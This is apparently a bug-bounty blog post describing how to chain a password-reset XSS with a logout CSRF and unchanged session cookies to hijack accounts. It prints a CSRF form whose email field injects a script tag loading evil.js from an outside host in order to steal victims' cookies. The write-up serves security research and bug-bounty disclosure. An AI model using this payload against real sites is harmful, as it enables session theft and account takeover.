So, we have Stored or Reflected Xss in Forgot your password.
But we can not carry out the attack on the user, since this is not a XSS in user account. And if we can not provide the required PoC, this vulnerability provides no threat and can not claim a greater reward in bug bounties!
However, the XSS is a personal account is fairly easy to rotate, and now I tell you how to do it ..
There is a page http://example.com/rememberpassword
There is POST request and not available filtering in email:
POST /rememberpassword HTTP/1.1
Accept-Encoding: gzip, deflate
In general, our task – to lure the victim to http://example.com/rememberpassword, run our code and steal her cookies. But this will not work if the victim is in his account.
And here to help us two vulnerabilities.
The first vulnerability – LOGOUT CSRF.
1) The vulnerability lies in the fact that you can LOG OUT the victim without her consent, ie it goes on http://example.com/en/account?option=logout, comes from an account.
To prevent this, for each logout link is attached unique csrf token, such as in social network https://login.vk.com/?act=logout&hash=8b8bcf7f3cbd6d32d5&_origin=https://vk.com .
2) The vulnerability broken authentication & session managament. It lies in the fact that when the victim came out of their account, and then went – cookies have not changed! Dangerous, number 2 https://www.owasp.org/index.php/Top_10_2013-Top_10 , can be used to exploit with other bugs. It is necessary to generate a new cookie values in the new input. We need to test twice – compare cookies to exit after the next login, no one character should not change.
Thus, the second bug, as a passive, nothing with him do not make. And with the first write our automatic CSRF exploit, loaded logout link from victim account in html hat as a picture:
<form action=”http://example.com/rememberpassword” method=”POST”>
<input type=”hidden” name=”formName” value=”rememberpassword” />
<input type=”hidden” name=”email” value=”<script src='http://securityz.net/evil.js” />
<input type=”hidden” name=”humanizm[id]” value=”d8ac3bdda21255b54bcdd549bb15962c” />
<input type=”hidden” name=”humanizm[input]” value=”” />
<input type=”submit” id=”qiece” value=”Submit request” />
Well, our exploit done.
Similar vulnerabilities (Logout CSRF/Broken Authentication) caught me everywhere and with their help, with the help of the XSS (is not in the user account) and with the help of sniffer can be easily hacked account (unless, of course, no httpOnly).
If y enjoy this article, subscribe me on twitter https://twitter.com/MaximYaremchuk /retweet and I’m add more articles in the process of research the security of web applications 🙂
#bugbounty #xss #BrokenAuthentication